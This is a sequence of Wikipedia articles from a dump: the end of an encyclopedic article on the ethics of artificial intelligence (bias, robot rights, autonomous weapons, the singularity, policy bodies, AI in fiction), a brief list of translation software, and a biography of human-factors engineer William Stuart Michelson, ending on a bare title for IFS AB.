Acquisition Device which can emulate human interaction. Vernor Vinge has suggested that a moment may come when some computers are smarter than humans. He calls this "the Singularity." He suggests that it may be somewhat or possibly very dangerous for humans. This is discussed by a philosophy called Singularitarianism. The Machine Intelligence Research Institute has suggested a need to build "Friendly AI", meaning that the advances which are already occurring with AI should also include an effort to make AI intrinsically friendly and humane. There are discussion on creating tests to see if an AI is capable of making ethical decisions. Alan Winfield concludes that the Turing test is flawed and the requirement for an AI to pass the test is too low. A proposed alternative test is one called the Ethical Turing Test, which would improve on the current test by having multiple judges decide if the AI's decision is ethical or unethical. In 2009, academics and technical experts attended a conference organized by the Association for the Advancement of Artificial Intelligence to discuss the potential impact of robots and computers and the impact of the hypothetical possibility that they could become self-sufficient and able to make their own decisions. They discussed the possibility and the extent to which computers and robots might be able to acquire any level of autonomy, and to what degree they could use such abilities to possibly pose any threat or hazard. They noted that some machines have acquired various forms of semi-autonomy, including being able to find power sources on their own and being able to independently choose targets to attack with weapons. They also noted that some computer viruses can evade elimination and have achieved "cockroach intelligence." They noted that self-awareness as depicted in science-fiction is probably unlikely, but that there were other potential hazards and pitfalls. However, there is one technology in particular that could truly bring the possibility of robots with moral competence to reality. In a paper on the acquisition of moral values by robots, Nayef Al-Rodhan mentions the case of neuromorphic chips, which aim to process information similarly to humans, nonlinearly and with millions of interconnected artificial neurons. Robots embedded with neuromorphic technology could learn and develop knowledge in a uniquely humanlike way. Inevitably, this raises the question of the environment in which such robots would learn about the world and whose morality they would inherit – or if they end up developing human 'weaknesses' as well: selfishness, a pro-survival attitude, hesitation etc. In Moral Machines: Teaching Robots Right from Wrong, Wendell Wallach and Colin Allen conclude that attempts to teach robots right from wrong will likely advance understanding of human ethics by motivating humans to address gaps in modern normative theory and by providing a platform for experimental investigation. As one example, it has introduced normative ethicists to the controversial issue of which specific learning algorithms to use in machines. Nick Bostrom and Eliezer Yudkowsky have argued for decision trees (such as ID3) over neural networks and genetic algorithms on the grounds that decision trees obey modern social norms of transparency and predictability (e.g. stare decisis), while Chris Santos-Lang argued in the opposite direction on the grounds that the norms of any age must be allowed to change and that natural failure to fully satisfy these particular norms has been essential in making humans less vulnerable to criminal "hackers". According to a 2019 report from the Center for the Governance of AI at the University of Oxford, 82% of Americans believe that robots and AI should be carefully managed. Concerns cited ranged from how AI is used in surveillance and in spreading fake content online (known as deep fakes when they include doctored video images and audio generated with help from AI) to cyberattacks, infringements on data privacy, hiring bias, autonomous vehicles, and drones that don't require a human controller. Ethics principles of artificial intelligence In the review of 84 ethics guidelines for AI 11 clusters of principles were found: transparency, justice and fairness, non-maleficence, responsibility, privacy, beneficence, freedom and autonomy, trust, sustainability, dignity, solidarity. Luciano Floridi and Josh Cowls created an ethical framework of AI principles set by four principles of bioethics (beneficence, non-maleficence, autonomy and justice) and an additional AI enabling principle – explicability. Transparency, accountability, and open source Bill Hibbard argues that because AI will have such a profound effect on humanity, AI developers are representatives of future humanity and thus have an ethical obligation to be transparent in their efforts. Ben Goertzel and David Hart created OpenCog as an open source framework for AI development. OpenAI is a non-profit AI research company created by Elon Musk, Sam Altman and others to develop open-source AI beneficial to humanity. There are numerous other open-source AI developments. Unfortunately, making code open source does not make it comprehensible, which by many definitions means that the AI code is not transparent. The IEEE has a standardisation effort on AI transparency. The IEEE effort identifies multiple scales of transparency for different users. Further, there is concern that releasing the full capacity of contemporary AI to some organizations may be a public bad, that is, do more damage than good. For example, Microsoft has expressed concern about allowing universal access to its face recognition software, even for those who can pay for it. Microsoft posted an extraordinary blog on this topic, asking for government regulation to help determine the right thing to do. Not only companies, but many other researchers and citizen advocates recommend government regulation as a means of ensuring transparency, and through it, human accountability. This strategy has proven controversial, as some worry that it will slow the rate of innovation. Others argue that regulation leads to systemic stability more able to support innovation in the long term. The OECD, UN, EU, and many countries are presently working on strategies for regulating AI, and finding appropriate legal frameworks. On June 26, 2019, the European Commission High-Level Expert Group on Artificial Intelligence (AI HLEG) published its “Policy and investment recommendations for trustworthy Artificial Intelligence”. This is the AI HLEG's second deliverable, after the April 2019 publication of the "Ethics Guidelines for Trustworthy AI". The June AI HLEG recommendations cover four principal subjects: humans and society at large, research and academia, the private sector, and the public sector. The European Commission claims that "HLEG's recommendations reflect an appreciation of both the opportunities for AI technologies to drive economic growth, prosperity and innovation, as well as the potential risks involved" and states that the EU aims to lead on the framing of policies governing AI internationally. Ethical challenges Biases in AI systems AI has become increasingly inherent in facial and voice recognition systems. Some of these systems have real business applications and directly impact people. These systems are vulnerable to biases and errors introduced by its human creators. Also, the data used to train these AI systems itself can have biases. For instance, facial recognition algorithms made by Microsoft, IBM and Face++ all had biases when it came to detecting people's gender; these AI systems were able to detect gender of white men more accurately than gender of darker skin men. Further, a 2020 study reviewed voice recognition systems from Amazon, Apple, Google, IBM, and Microsoft found that they have higher error rates when transcribing black people's voices than white people's. Furthermore, Amazon terminated their use of AI hiring and recruitment because the algorithm favored male candidates over female ones. This was because Amazon's system was trained with data collected over 10-year period that came mostly from male candidates. Bias can creep into algorithms in many ways. For example, Friedman and Nissenbaum identify three categories of bias in computer systems: existing bias, technical bias, and emergent bias. In natural language processing, problems can arise from the text corpus — the source material the algorithm uses to learn about the relationships between different words. Large companies such as IBM, Google, etc. have made efforts to research and address these biases. One solution for addressing bias is to create documentation for the data used to train AI systems. Process mining can be an important tool for organizations to achieve compliance with proposed AI regulations by identifying errors, monitoring processes, identifying potential root causes for improper execution, and other functions. The problem of bias in machine learning is likely to become more significant as the technology spreads to critical areas like medicine and law, and as more people without a deep technical understanding are tasked with deploying it. Some experts warn that algorithmic bias is already pervasive in many industries and that almost no one is making an effort to identify or correct it. There are some open-sourced tools by civil societies that are looking to bring more awareness to biased AI. Robot rights "Robot rights" is the concept that people should have moral obligations towards their machines, akin to human rights or animal rights. It has been suggested that robot rights (such as a right to exist and perform its own mission) could be linked to robot duty to serve humanity, analogous to linking human rights with human duties before society. These could include the right to life and liberty, freedom of thought and expression, and equality before the law. The issue has been considered by the Institute for the Future and by the U.K. Department of Trade and Industry. Experts disagree on how soon specific and detailed laws on the subject will be necessary. Glenn McGee reported that sufficiently humanoid robots might appear by 2020, while Ray Kurzweil sets the date at 2029. Another group of scientists meeting in 2007 supposed that at least 50 years had to pass before any sufficiently advanced system would exist. The rules for the 2003 Loebner Prize competition envisioned the possibility of robots having rights of their own: 61. If in any given year, a publicly available open-source Entry entered by the University of Surrey or the Cambridge Center wins the Silver Medal or the Gold Medal, then the Medal and the Cash Award will be awarded to the body responsible for the development of that Entry. If no such body can be identified, or if there is disagreement among two or more claimants, the Medal and the Cash Award will be held in trust until such time as the Entry may legally possess, either in the United States of America or in the venue of the contest, the Cash Award and Gold Medal in its own right. In October 2017, the android Sophia was granted "honorary" citizenship in Saudi Arabia, though some considered this to be more of a publicity stunt than a meaningful legal recognition. Some saw this gesture as openly denigrating of human rights and the rule of law. The philosophy of Sentientism grants degrees of moral consideration to all sentient beings, primarily humans and most non-human animals. If artificial or alien intelligence show evidence of being sentient, this philosophy holds that they should be shown compassion and granted rights. Joanna Bryson has argued that creating AI that requires rights is both avoidable, and would in itself be unethical, both as a burden to the AI agents and to human society. Threat to human dignity Joseph Weizenbaum argued in 1976 that AI technology should not be used to replace people in positions that require respect and care, such as: A customer service representative (AI technology is already used today for telephone-based interactive voice response systems) A nursemaid for the elderly (as was reported by Pamela McCorduck in her book The Fifth Generation) A soldier A judge A police officer A therapist (as was proposed by Kenneth Colby in the 70s) Weizenbaum explains that we require authentic feelings of empathy from people in these positions. If machines replace them, we will find ourselves alienated, devalued and frustrated, for the artificially intelligent system would not be able to simulate empathy. Artificial intelligence, if used in this way, represents a threat to human dignity. Weizenbaum argues that the fact that we are entertaining the possibility of machines in these positions suggests that we have experienced an "atrophy of the human spirit that comes from thinking of ourselves as computers." Pamela McCorduck counters that, speaking for women and minorities "I'd rather take my chances with an impartial computer," pointing out that there are conditions where we would prefer to have automated judges and police that have no personal agenda at all. However, Kaplan and Haenlein stress that AI systems are only as smart as the data used to train them since they are, in their essence, nothing more than fancy curve-fitting machines; Using AI to support a court ruling can be highly problematic if past rulings show bias toward certain groups since those biases get formalized and engrained, which makes them even more difficult to spot and fight against. Weizenbaum was also bothered that AI researchers (and some philosophers) were willing to view the human mind as nothing more than a computer program (a position now known as computationalism). To Weizenbaum, these points suggest that AI research devalues human life. AI founder John McCarthy objects to the moralizing tone of Weizenbaum's critique. "When moralizing is both vehement and vague, it invites authoritarian abuse," he writes. Bill Hibbard writes that "Human dignity requires that we strive to remove our ignorance of the nature of existence, and AI is necessary for that striving." Liability for self-driving cars As the widespread use of autonomous cars becomes increasingly imminent, new challenges raised by fully autonomous vehicles must be addressed. Recently, there has been debate as to the legal liability of the responsible party if these cars get into accidents. In one report where a driverless car hit a pedestrian, the driver was inside the car but the controls were fully in the hand of computers. This led to a dilemma over who was at fault for the accident. In another incident on March 18, 2018, Elaine Herzberg was struck and killed by a self-driving Uber in Arizona. In this case, the automated car was capable of detecting cars and certain obstacles in order to autonomously navigate the roadway, but it could not anticipate a pedestrian in the middle of the road. This raised the question of whether the driver, pedestrian, the car company, or the government should be held responsible for her death. Currently, self-driving cars are considered semi-autonomous, requiring the driver to pay attention and be prepared to take control if necessary. Thus, it falls on governments to regulate the driver who over-relies on autonomous features. as well educate them that these are just technologies that, while convenient, are not a complete substitute. Before autonomous cars become widely used, these issues need to be tackled through new policies. Weaponization of artificial intelligence Some experts and academics have questioned the use of robots for military combat, especially when such robots are given some degree of autonomy. On October 31, 2019, the United States Department of Defense's Defense Innovation Board published the draft of a report recommending principles for the ethical use of artificial intelligence by the Department of Defense that would ensure a human operator would always be able to look into the 'black box' and understand the kill-chain process. However, a major concern is how the report will be implemented. The US Navy has funded a report which indicates that as military robots become more complex, there should be greater attention to implications of their ability to make autonomous decisions. Some researchers state that autonomous robots might be more humane, as they could make decisions more effectively. Within this last decade, there has been intensive research in autonomous power with the ability to learn using assigned moral responsibilities. "The results may be used when designing future military robots, to control unwanted tendencies to assign responsibility to the robots." From a consequentialist view, there is a chance that robots will develop the ability to make their own logical decisions on whom to kill and that is why there should be a set moral framework that the AI cannot override. There has been a recent outcry with regard to the engineering of artificial intelligence weapons that have included ideas of a robot takeover of mankind. AI weapons do present a type of danger different from that of human-controlled weapons. Many governments have begun to fund programs to develop AI weaponry. The United States Navy recently announced plans to develop autonomous drone weapons, paralleling similar announcements by Russia and Korea respectively. Due to the potential of AI weapons becoming more dangerous than human-operated weapons, Stephen Hawking and Max Tegmark signed a "Future of Life" petition to ban AI weapons. The message posted by Hawking and Tegmark states that AI weapons pose an immediate danger and that action is required to avoid catastrophic disasters in the near future. "If any major military power pushes ahead with the AI weapon development, a global arms race is virtually inevitable, and the endpoint of this technological trajectory is obvious: autonomous weapons will become the Kalashnikovs of tomorrow", says the petition, which includes Skype co-founder Jaan Tallinn and MIT professor of linguistics Noam Chomsky as additional supporters against AI weaponry. Physicist and Astronomer Royal Sir Martin Rees has warned of catastrophic instances like "dumb robots going rogue or a network that develops a mind of its own." Huw Price, a colleague of Rees at Cambridge, has voiced a similar warning that humans might not survive when intelligence "escapes the constraints of biology." These two professors created the Centre for the Study of Existential Risk at Cambridge University in the hope of avoiding this threat to human existence. Regarding the potential for smarter-than-human systems to be employed militarily, the Open Philanthropy Project writes that these scenarios "seem potentially as important as the risks related to loss of control", but research investigating AI's long-run social impact have spent relatively little time on this concern: "this class of scenarios has not been a major focus for the organizations that have been most active in this space, such as the Machine Intelligence Research Institute (MIRI) and the Future of Humanity Institute (FHI), and there seems to have been less analysis and debate regarding them". Opaque algorithms Approaches like machine learning with neural networks can result in computers making decisions that they and the humans who programmed them cannot explain. It is difficult for people to determine if such decisions are fair and trustworthy, leading potentially to bias in AI systems going undetected, or people rejecting the use of such systems. This has led to advocacy and in some jurisdictions legal requirements for explainable artificial intelligence. Singularity Many researchers have argued that, by way of an "intelligence explosion," a self-improving AI could become so powerful that humans would not be able to stop it from achieving its goals. In his paper "Ethical Issues in Advanced Artificial Intelligence" and subsequent book Superintelligence: Paths, Dangers, Strategies, philosopher Nick Bostrom argues that artificial intelligence has the capability to bring about human extinction. He claims that general superintelligence would be capable of independent initiative and of making its own plans, and may therefore be more appropriately thought of as an autonomous agent. Since artificial intellects need not share our human motivational tendencies, it would be up to the designers of the superintelligence to specify its original motivations. Because a superintelligent AI would be able to bring about almost any possible outcome and to thwart any attempt to prevent the implementation of its goals, many uncontrolled unintended consequences could arise. It could kill off all other agents, persuade them to change their behavior, or block their attempts at interference. However, instead of overwhelming the human race and leading to our destruction, Bostrom has also asserted that superintelligence can help us solve many difficult problems such as disease, poverty, and environmental destruction, and could help us to “enhance” ourselves. The sheer complexity of human value systems makes it very difficult to make AI's motivations human-friendly. Unless moral philosophy provides us with a flawless ethical theory, an AI's utility function could allow for many potentially harmful scenarios that conform with a given ethical framework but not "common sense". According to Eliezer Yudkowsky, there is little reason to suppose that an artificially designed mind would have such an adaptation. AI researchers such as Stuart J. Russell, Bill Hibbard, Roman Yampolskiy, Shannon Vallor, Steven Umbrello and Luciano Floridi have proposed design strategies for developing beneficial machines. Actors in AI ethics There are many organisations concerned with AI ethics and policy, public and governmental as well as corporate and societal. Amazon, Google, Facebook, IBM, and Microsoft have established a non-profit, The Partnership on AI to Benefit People and Society, to formulate best practices on artificial intelligence technologies, advance the public's understanding, and to serve as a platform about artificial intelligence. Apple joined in January 2017. The corporate members will make financial and research contributions to the group, while engaging with the scientific community to bring academics onto the board. The IEEE put together a Global Initiative on Ethics of Autonomous and Intelligent Systems which has been creating and revising guidelines with the help of public input, and accepts as members many professionals from within and without its organization. Traditionally, government has been used by societies to ensure ethics are observed through legislation and policing. There are now many efforts by national governments, as well as transnational government and non-government organizations to ensure AI is ethically applied. Intergovernmental initiatives The European Commission has a High-Level Expert Group on Artificial Intelligence. On 8 April 2019, this published its 'Ethics Guidelines for Trustworthy Artificial Intelligence'. The European Commission also has a Robotics and Artificial Intelligence Innovation and Excellence unit, which published a white paper on excellence and trust in artificial intelligence innovation on 19 February 2020. The OECD established an OECD AI Policy Observatory. Governmental initiatives In the United States the Obama administration put together a Roadmap for AI Policy. The Obama Administration released two prominent white papers on the future and impact of AI. In 2019 the White House through an executive memo known as the "American AI Initiative" instructed NIST the (National Institute of Standards and Technology) to begin work on Federal Engagement of AI Standards (February 2019). In January 2020, in the United States, the Trump Administration released a draft executive order issued by the Office of Management and Budget (OMB) on “Guidance for Regulation of Artificial Intelligence Applications" (“OMB AI Memorandum”). The order emphasizes the need to invest in AI applications, boost public trust in AI, reduce barriers for usage of AI, and keep American AI technology competitive in a global market. There is a nod to the need for privacy concerns, but no further detail on enforcement. The advances of American AI technology seems to be the focus and priority. Additionally, federal entities are even encouraged to use the order to circumnavigate any state laws and regulations that a market might see as too onerous to fulfill. The Computing Community Consortium (CCC) weighed in with a 100-plus page draft report – A 20-Year Community Roadmap for Artificial Intelligence Research in the US The Center for Security and Emerging Technology advises US policymakers on the security implications of emerging technologies such as AI. The Non-Human Party is running for election in New South Wales, with policies around granting rights to robots, animals and generally, non-human entities whose intelligence has been overlooked. Academic initiatives There are three research institutes at the University of Oxford that are centrally focused on AI ethics. The Future of Humanity Institute that focuses both on AI Safety and the Governance of AI. The Institute for Ethics in AI, directed by John Tasioulas, whose primary goal, among others, is to promote AI ethics as a field proper in comparison to related applied ethics fields. The Oxford Internet Institute, directed by Luciano Floridi, focuses on the ethics of near-term AI technologies and ICTs. The AI Now Institute at NYU is a research institute studying the social implications of artificial intelligence. Its interdisciplinary research focuses on the themes bias and inclusion, labour and automation, rights and liberties, and safety and civil infrastructure. The Institute for Ethics and Emerging Technologies (IEET) researches the effects of AI on unemployment, and policy. The Institute for Ethics in Artificial Intelligence (IEAI) at the Technical University of Munich directed by Christoph Lütge conducts research across various domains such as mobility, employment, healthcare and sustainability. Private organizations Algorithmic Justice League Black in AI Data for Black Lives Queer in AI Role and impact of fiction The role of fiction with regards to AI ethics has been a complex one. One can distinguish three levels at which fiction has impacted the development of artificial intelligence and robotics: Historically, fiction has been prefiguring common tropes that have not only influenced goals and visions for AI, but also outlined ethical questions and common fears associated with it. During the second half of the twentieth and the first decades of the twenty-first century, popular culture, in particular movies, TV series and video games have frequently echoed preoccupations and dystopian projections around ethical questions concerning AI and robotics. Recently, these themes have also been increasingly treated in literature beyond the realm of science fiction. And, as Carme Torras, research professor at the Institut de Robòtica i Informàtica Industrial (Institute of robotics and industrial computing) at the Technical University of Catalonia notes, in higher education, science fiction is also increasingly used for teaching technology-related ethical issues in technological degrees. History Historically speaking, the investigation of moral and ethical implications of “thinking machines” goes back at least to the Enlightenment: Leibniz already poses the question if we might attribute intelligence to a mechanism that behaves as if it were a sentient being, and so does Descartes, who describes what could be considered an early version of the Turing Test. The romantic period has several times envisioned artificial creatures that escape the control of their creator with dire consequences, most famously in Mary Shelley’s Frankenstein. The widespread preoccupation with industrialization and mechanization in the 19th and early 20th century, however, brought ethical implications of unhinged technical developments to the forefront of fiction: R.U.R – Rossum’s Universal Robots, Karel Čapek’s play of sentient robots endowed with emotions used as slave labor is not only credited with the invention of the term ‘robot’ (derived from the Czech word for forced labor, robota) but was also an international success after it premiered in 1921. George Bernard Shaw's play Back to Methuselah, published in 1921, questions at one point the validity of thinking machines that act like humans; Fritz Lang's 1927 film Metropolis shows an android leading the uprising of the exploited masses against the oppressive regime of a technocratic society. Impact on technological development While the anticipation of a future dominated by potentially indomitable technology has fueled the imagination of writers and film makers for a long time, one question has been less frequently analyzed, namely, to what extent fiction has played a role in providing inspiration for technological development. It has been documented, for instance, that the young Alan Turing saw and appreciated G.B. Shaw's play Back to Methuselah in 1933 (just 3 years before the publication of his first seminal paper which laid the groundwork for the digital computer), and he would likely have been at least aware of plays like R.U.R., which was an international success and translated into many languages. One might also ask the question which role science fiction played in establishing the tenets and ethical implications of AI development: Isaac Asimov conceptualized his Three laws of Robotics in the 1942 short story “Runaround”, part of the short story collection I, Robot; Arthur C. Clarke's short “The sentinel”, on which Stanley Kubrick's film 2001: A Space Odyssey is based, was written in 1948 and published in 1952. Another example (among many others) would be Philip K. Dicks numerous short stories and novels – in particular Do Androids Dream of Electric Sheep?, published in 1968, and featuring its own version of a Turing Test, the Voight-Kampff Test, to gauge emotional responses of androids indistinguishable from humans. The novel later became the basis of the influential 1982 movie Blade Runner by Ridley Scott. Science fiction has been grappling with ethical implications of AI developments for decades, and thus provided a blueprint for ethical issues that might emerge once something akin to general artificial intelligence has been achieved: Spike Jonze's 2013 film Her shows what can happen if a user falls in love with the seductive voice of his smartphone operating system; Ex Machina, on the other hand, asks a more difficult question: if confronted with a clearly recognizable machine, made only human by a face and an empathetic and sensual voice, would we still be able to establish an emotional connection, still be seduced by it? (The film echoes a theme already present two centuries earlier, in the 1817 short story “The Sandmann” by E.T.A. Hoffmann.) The theme of coexistence with artificial sentient beings is also the theme of two recent novels: Machines like me by Ian McEwan, published in 2019, involves (among many other things) a love-triangle involving an artificial person as well as a human couple. Klara and the Sun by Nobel Prize winner Kazuo Ishiguro, published in 2021, is the first-person account of Klara, an ‘AF’ (artificial friend), who is trying, in her own way, to help the girl she is living with, who, after having been ‘lifted’ (i.e. having been subjected to genetic enhancements), is suffering from a strange illness. TV series While ethical questions linked to AI have been featured in science fiction literature and feature films for decades, the emergence of the TV series as a genre allowing for longer and more complex story lines and character development has led to some significant contributions that deal with ethical implications of technology. The Swedish series Real Humans (2012–2013) tackled the complex ethical and social consequences linked to the integration of artificial sentient beings in society. The British dystopian science fiction anthology series Black Mirror (2013–2019) was particularly notable for experimenting with dystopian fictional developments linked to a wide variety of recent technology developments. Both the French series Osmosis (2020) and British series The One deal with the question of what can happen if technology tries to find the ideal partner for a person. Several episodes of the Netflix series Love, Death+Robots have imagined scenes of robots and humans living together. The most representative one of them is S02 E01, it shows how bad the consequences can be when robots get out of control if humans rely too much on them in their lives. Future visions in fiction and games The movie The Thirteenth Floor suggests a future where simulated worlds with sentient inhabitants are created by computer game consoles for the purpose of entertainment. The movie The Matrix suggests a future where the dominant species on planet Earth are sentient machines and humanity is treated with utmost speciesism. The short story "The Planck Dive" suggests a future where humanity has turned itself into software that can be duplicated and optimized and the relevant distinction between types of software is sentient and non-sentient. The same idea can be found in the Emergency Medical Hologram of Starship Voyager, which is an apparently sentient copy of a reduced subset of the consciousness of its creator, Dr. Zimmerman, who, for the best motives, has created the system to give medical assistance in case of emergencies. The movies Bicentennial Man and A.I. deal with the possibility of sentient robots that could love. I, Robot explored some aspects of Asimov's three laws. All these scenarios try to foresee possibly unethical consequences of the creation of sentient computers. The ethics of artificial intelligence is one of several core themes in BioWare's Mass Effect series of games. It explores the scenario of a civilization accidentally creating AI through a rapid increase in computational power through a global scale neural network. This event caused an ethical schism between those who felt bestowing organic rights upon the newly sentient Geth was appropriate and those who continued to see them as disposable machinery and fought to destroy them. Beyond the initial conflict, the complexity of the relationship between the machines and their creators is another ongoing theme throughout the story. "Detroit: Become Human" is one of the most famous video games which discusses the ethics of artificial intelligence recently. Quantic Dream designed the chapters of the game in a very innovative way, which used interactive storylines to give players a better immersive gaming experience. Players will manipulate three different awakened bionic man, in the face of different events to make different choices to achieve the purpose of changing the human view of the bionic group and different choices will result in different endings. This is one of the few games that puts players in the bionic perspective, which allows them to better consider the rights and interests of robots once a true artificial intelligence is created. Over time, debates have tended to focus less and less on possibility and more on desirability, as emphasized in the "Cosmist" and "Terran" debates initiated by Hugo de Garis and Kevin Warwick. A Cosmist, according to Hugo de Garis, is actually seeking to build more intelligent successors to the human species. Experts at the University of Cambridge have argued that AI is portrayed in fiction and nonfiction overwhelmingly as racially White, in ways that distort perceptions of its risks and benefits. See also Notes External links Ethics of Artificial Intelligence at the Internet Encyclopedia of Philosophy Ethics of Artificial Intelligence and Robotics at the Stanford Encyclopedia of Philosophy BBC News: Games to take on a life of their own Who's Afraid of Robots? , an article on humanity's fear of artificial intelligence. A short history of computer ethics AI Ethics Guidelines Global Inventory by Algorithmwatch Philosophy of artificial intelligence Ethics of science and technology
56083022
https://en.wikipedia.org/wiki/List%20of%20translation%20software
List of translation software
This is a list of notable translation software. Software Recommended PO file editors/translator (in no particular order): XEmacs (with po-mode): runs on Unices with X GNU Emacs (with po-mode): runs on Unices and Windows poEdit: Linux, Mac OS X, and Windows poEdit does support multiple plural forms since version 1.3.. OmegaT is another translation tool that can translate PO files. It is written in Java so it is available for multiple platforms (including Linux and Windows). It can be downloaded from SourceForge. GNU Gettext (Linux/Unix) used for the GNU Translation Project. Gettext also provides msgmerge that makes merging translations easy. Vim (Linux/Unix and Windows versions available) with PO ftplugin for easier editing of GNU gettext PO files. gtranslator for Linux Virtaal: Linux and Windows; for Mac OS X 10.5 and newer a Beta release Native support for Gettext PO translation as well as XLIFF and other formats. Simple interface with powerful machine translation, translation memory and terminology management features. GlobalSight Other tools Google Translator Toolkit References Material was copied from this source, which is available under a Creative Commons Attribution-ShareAlike 2.0 Generic (CC BY-SA 2.0) license. See also Computer-assisted translation Comparison of computer-assisted translation tools Machine translation Translation memory Lists of software Software
65403428
https://en.wikipedia.org/wiki/William%20Stuart%20Michelson
William Stuart Michelson
William Stuart Michelson (born 1987) is an American engineer and member of the research faculty at the Georgia Tech Research Institute. Michelson is known as a subject matter expert in Human Systems Engineering. He leads Human Factors and Ergonomics and Human Systems Integration (HSI) efforts for DoD customers specializing in tactical display design spanning command and control, training, unmanned vehicle ground control stations , Manned-unmanned teaming, and mission planning. He has expertise in digital human modeling/ergonomic/anthropometric analyses to assess cockpit accommodation and experience with wearable soldier systems and tactical equipment design. Since 2000, Michelson has organized the American venue and annual Symposium on Dynamic Flight Behavior for Aerial Robotics for the International Aerial Robotics Competition (IARC). The IARC, which seeks to advance the state of the art in fully autonomous aerial robotics, was created by his father, Robert C. Michelson, in 1991 and has two venues: the American Venue and the Asia/Pacific Venue. Michelson is a Lifetime Charter member of Trail Life USA, and currently serves as the Vice Chairman of the National Board of Director’s for the organization. He was involved in the launch of the Trail Life USA program in September 2013. Before joining the Board of Directors, Michelson served as the State Leadership Chairman for Georgia, and served as the coordinator for the Atlanta venue of the 2014 Trail Leader Training Conference. He pioneered an adult training model and oversaw its deployment as the chairman an inaugural adult leader training event at the Trail Life USA headquarters located at Camp Aiken in South Carolina. As a certified firearm’s instructor, he led a diverse national team of volunteers to develop the Trail Life USA shooting sports program. As a youth, Michelson came out of the Boy Scouts of America after earning his Eagle Scout rank with 6 Palms and being bestowed the Vigil Honor in the Order of the Arrow. As an adult, and prior to leaving the Boy Scouts of America, Michelson provided a monthly training program for adult volunteers and wrote custom training programs for youth that were adopted nationwide. He led several international Scouting initiatives, as well as organizing and planning Scouting events attended by thousands on a national scale. Other past volunteer roles within the organization included Scoutmaster, Varsity Coach, District Member at Large, Commissioner, and National Order of the Arrow staff. From 2013 to 2014, Michelson served at an advisory capacity to the board of Reformation Hope in matters dealing with youth programs. He led efforts to foster new opportunities to help youth programs flourish in the country of Haiti and to meet orphaned children's needs, including an exchange program and a clothing acquisition fund. His most recent visit to the country was in 2016. In 2020, Michelson became a volunteer with the Evangelical Council for Abuse Prevention (ECAP), working on projects aimed at protecting children and other vulnerable populations from abuse. Biography Early life Michelson was born in 1987 in Atlanta Georgia, the second son of Robert and Denise Michelson, and is related to Christian Michelsen, the first Prime Minister of Norway. As a youth, Michelson was involved in outdoor activities, especially those involving camping and outdoor skills. To this day, he remains a student of outdoor activities such as sailing, primitive survival skills, archery, and firearms proficiency. Education Michelson attended Cherokee Christian School during first through eighth grades. He attended Dominion Christian High School prior to enrolling at the Georgia Institute of Technology where he attained scientific degrees in Science, Technology, and Culture, as well as Human Computer Interaction (with honors). Career Michelson has held an Associate Human Factors Professional status from the Board of Certification in Professional Ergonomics, is recognized as a graphic design professional by the International Academy of Computer Training, is certified to conduct ethical Human Subjects Research by Collaborative Institutional Training Initiative, and presently serves the Georgia Tech Research Institute as Senior Research Scientist. He has published over 50 Journal papers, book chapters and reports. In 2018 he became the Associate Head of the Georgia Tech Research Institute’s Human Systems Engineering Branch of the GTRI Electronic Systems Laboratory. Professional activities Michelson is a full Member of the Human Factors and Ergonomics Society, Life member of the National Defense Industrial Association, and a member of the Association for Unmanned Vehicle Systems International. He serves as a Competition Director on behalf of RoboNation (formerly known as the AUVSI Foundation). As a member of the Georgia Tech faculty, Michelson has taught several courses including modules in PMASE 6131: Georgia Tech Professional Education, 2017-2018, Applied Systems Engineering: Human Factors Engineering, Training, Survivability, Habitability, User Centered Design, and Test & Evaluation. Michelson has also serves as an instructor for the Georgia Tech Professional Education Short Courses Introduction to Human Systems Integration and Fundamentals of Modern Systems Engineering. He is also organizer of the American Venue of the annual International Aerial Robotics Competition and annual Symposium on Dynamic Flight Behavior for Aerial Robotics Professional programmatic interests In 2007 Michelson began work at the Georgia Tech Research Institute. Michelson has supported and led numerous notable programs within the Georgia Tech Research Institute leveraging his knowledge of soldier loadout and autonomous unmanned systems. Notably, he has designed graphical user interfaces, developed human-centered system requirements, led programs to quantify human performance, assessed anthropometric accommodations, and supported system test and evaluation for DoD stakeholders spanning the United States Navy, Air Force, Army, and Marine Corps. A frequent speaker across the Georgia Institute of Technology, international conferences, and government entities such as DARPA, Michelson is known for developing novel concepts for the command and control of unmanned systems, utilizing Model Based Systems Engineering to express man-machine teaming relationships, graphical user interface design for DoD systems, military mission planning concepts, and basic research on the touch zone sizes for military touchscreens in moving environments. Michelson has supported and organized a number of military working groups spanning topics such as electronic warfare, unmanned systems, and military end user engagement. Within the Human Factors Engineering context, Michelson is an advocate for “Mission-Driven Robotics”. Professional honors and awards Michelson received the Deputy Director’s Certificate for Service from the U.S. Army Soldier Battle Lab at Fort Benning. He is also the recipient of the University System of Georgia Award for Exceptional Composition and the Georgia Secretary of State’s Commendation for Outstanding Citizenship. Avocations Michelson is certified in various fields including amateur radio (Technician Class Operator’s License, station KG4ZIR) and scuba diving. He has been a PADI certified SCUBA diver since 2000, and has been a recreational diver in the Caribbean Sea and Atlantic Ocean. He became a certified firearms instructor in 2012. He is fluent in English, and has proficiency in German. Presence in popular media and literature Michelson has been often quoted in news programming with regard to the International Aerial Robotics Competition and the applications of the underlying technology to military and civilian spheres as well as Trail Life USA on radio and television. Michelson’s work on the command and control of heterogenous unmanned systems was featured by Drone360 Magazine in 2016, and he has been referenced in Backpacker Magazine. Michelson was also featured in a commercial produced by General Dynamics Mission Systems promoting advancement of the next generation of autonomous systems through collegiate student competition and has been featured repeatedly in promotional materials produced by the Association for Unmanned Vehicle Systems International Representative select publications “Concepts for Manned Unmanned Teaming Behaviors in Model Based Systems Engineering,”National Defense Industrial Association Ground Vehicle Systems Engineering and Technology Symposium, 2019 “Human Centered Teaming of Autonomous Battlefield Robotics,”National Defense Industrial Association Ground Vehicle Systems Engineering and Technology Symposium, 2018 “A Survey of the Human-Centered Approach to Micro Air Vehicles”. Chapter 90. Springer Handbook of Unmanned Aerial Vehicles, Springer‑Verlag Publishing Company, 2014 “Human Centered Alerting Strategies Supporting Cross Platform Teams of Unmanned Vehicles”. AUVSI Xponential Unmanned Systems Conference, 2019 ”A Model of Human Machine Interaction for Mission-Driven Robotics”. AUVSI Xponential Unmanned Systems Conference, 2020 See also Georgia Tech Research Institute International Aerial Robotics Competition Trail Life USA References External links Georgia Tech Research Institute Trail Life USA Board Member of Trail Life USA Reformation Hope Evangelical Council for Abuse Prevention Living people 1987 births 21st-century American scientists American people of Norwegian descent Engineering educators Georgia Tech faculty Georgia Tech alumni Georgia Tech Research Institute people Amateur radio people People from Atlanta
29459946
https://en.wikipedia.org/wiki/IFS%20AB
IFS AB
